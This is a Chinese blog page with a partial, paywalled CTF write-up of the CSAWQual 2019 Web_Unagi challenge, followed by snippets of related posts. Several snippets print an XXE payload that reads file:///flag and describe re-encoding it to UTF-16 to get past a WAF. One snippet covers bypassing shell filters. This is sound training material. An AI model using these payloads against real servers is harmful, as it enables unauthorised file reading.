[CSAWQual 2019]Web_Unagi - 文件上传+XXE注入(XML编码绕过)

已于 2023-10-10 16:06:22 修改
阅读量1.3k 收藏
点赞数
文章标签: web安全 安全 ctf xml xxe注入 编码绕过 文件上传
于 2023-10-10 09:01:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oZuoShen123/article/details/133721749
版权
本文详细介绍了在CSAWQual 2019比赛中遇到的Web_Unagi挑战,该挑战涉及文件上传和XXE注入问题。作者通过分析发现是XML编码绕过,利用不同编码方式(如UTF-16)来绕过WAF,并成功获取flag。文章总结了编写XML时的注意事项,包括属性名的大小写敏感性和如何利用intro属性输出长内容。
摘要由CSDN通过智能技术生成

[CSAWQual 2019]Web_Unagi

1

1 解题流程

这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html

1.1 分析

  1. 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那么就是XXE注入了
    2
  2. 点击about得到flag位置: Flag is located at /flag, come get it

1.2 解题

  1. 编写XXE注入文件,以xml结尾
    <?xml version='1.0'?>
<!
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Hillain
关注
专栏目录
订阅专栏
BUUCTF:[CSAWQual 2019]Web_Unagi -- xxe 简单的外部实体bypass ,编码绕过
Zero_Adam的博客
04-08 672
二、学的的 这个好像是xxe的那啥,默认技巧吧,,utf8上传说有waf,然后就换成utf16进行上传 最近做的xxe的题,都是简单的每waf的。外部实体注入就好了,,, 注意,如果,system的命令 file:///flag。不好使的时候,还可用 PHP的伪协议来做,php://filer/这些来,到时候多试试就好了 三、 WP 初末 看一下iconv命令吧,总不能一个题什么都没学到东西啊, 语句: iconv -f utf8 -t utf16 test.xml -o aaa.xml 这个语句弄上
[CSAWQual 2019]Web_Unagi
snowlyzz的博客
09-13 201
xxe 绕过waf。
5月23日学习记录
weixin_74020633的博客
05-23 813
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。我看nss上有人说不存在的字符绕过escapeshellarg 时,回显不对,查看源码也没有hint,如果出现这种情况的话可以抓包再传一次参(是重新传参,不是重发啊),就可以,最后查看flag也是。我尝试用大写来绕过对flag的过滤,但是绕过不了,把L和A都过滤了,所以使用通配符绕过。过滤了空格,flag和cat等命令,转义符也用不了。
BUUCTF:[CSAWQual 2019]Web_Unagi
末初的CSDN博客
04-06 1949
XXE编码转换为UTF-16绕过 2.xml <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> ...
buuctf_练[CSAWQual 2019]Web_Unagi
m0_66225311的博客
10-26 317
`XXE`漏洞利用,`xml`文件转换编码绕过`WAF`(UTF-8 --> UTF-16),`xml`文件格式的书写
xxe编码绕过(8-19)
Realiy的博客
08-19 1721
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能绕过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
[CSAWQual 2019]Unagi
07-27
回答: 在CSAWQual 2019比赛中,关于Unagi的问题,根据引用\[1\]、\[2\]和\[3\]的内容,Unagi是一个涉及XML注入的题目。参赛者需要利用之前的XXE模板或者自己构造的XML文件,通过上传恶意的XML文件来获取flag。具体的...
BUUCTF [CSAWQual 2019]Web_Unagi 1
weixin_45642610的博客
09-09 593
BUUCTF [CSAWQual 2019]Web_Unagi 1 提示在/flag 有提示了上传xml文件及其格式 直接用之前xml注入的上传即可。 改文件名为1.xml上传即可得flag <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>&xx
BUUCTF--[CSAWQual 2019]Web_Unagi
qq_46263951的博客
07-22 357
进入页面后看到一个Upload 看到给出的提示是让我们上传一个XML文件,刚好今天做了一个关于XMLXXE漏洞的题,底下贴链接,漏洞点为 给出提示flag在/flag中,所以构造出的payload为 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <userna.
[CSAWQual 2019]Web_Unagi ---不会编程的崽
不会编程的崽的博客
03-07 574
xxe编码绕过
BUUCTF:[CSAWQual 2019]Web_Unagi
../../../../../../../
06-08 1044
打开界面 看看其他有什么内容: 来看看格式事例: 从信息提示我们可以知道要通过编写xml文件上传 即通过XXE编码转换成utf-16编码绕过 我们可以利用vim编辑xml文件(取名为2.xml) 构造payload如下: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <
[CSAWQual 2019]Web_Unagi XXE漏洞练习题
最新发布
dalaojiaoweb的博客
07-09 269
进来之后我们进行一个信息收集,在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。使用我们的Visual Studio Code进行一个编码的转换,因为直接上传会被waf过滤。可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。利用我们学习的xxe漏洞的知识来进行一个模板的套用。最后进行一个文件上传即可得到flag。选择utf-16 LE,然后保存。这道题就是简单的xxe漏洞的注入
[CSAWQual 2019]Web_Unagi xxe转码绕过waf
qq_54929891的博客
04-28 1429
搜索给我们的信息 flag在flag下面,可能要用到文件读取或者系统命令 可以看到它叫我们上传一个xml文件,应该是xxe漏洞了 这里应该是提示我们会回显哪些属性,可以看到password没有显示出来 利用之前的XXE模板https://xz.aliyun.com/t/6887#toc-0 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]&gt.
XCTF Web 记录(unagi
ximo的博客
03-09 365
unagi 打开页面,四个跳转。 一个提示页面: 一个利用方式提示: 一个利用点: 利用方式: XXE注入。 构造XXE注入代码: <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <pa
[CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
scrawman的博客
01-27 2965
[CSAWQual 2019]Web_Unagi 看提示有告诉你xml的格式 <?xml version='1.0'?> <!DOCTYPE users [ <!ENTITY xxe SYSTEM "file:///flag" >]> <users> <user> <username>bob</username> <password>passwd2</passwor
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hillain

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值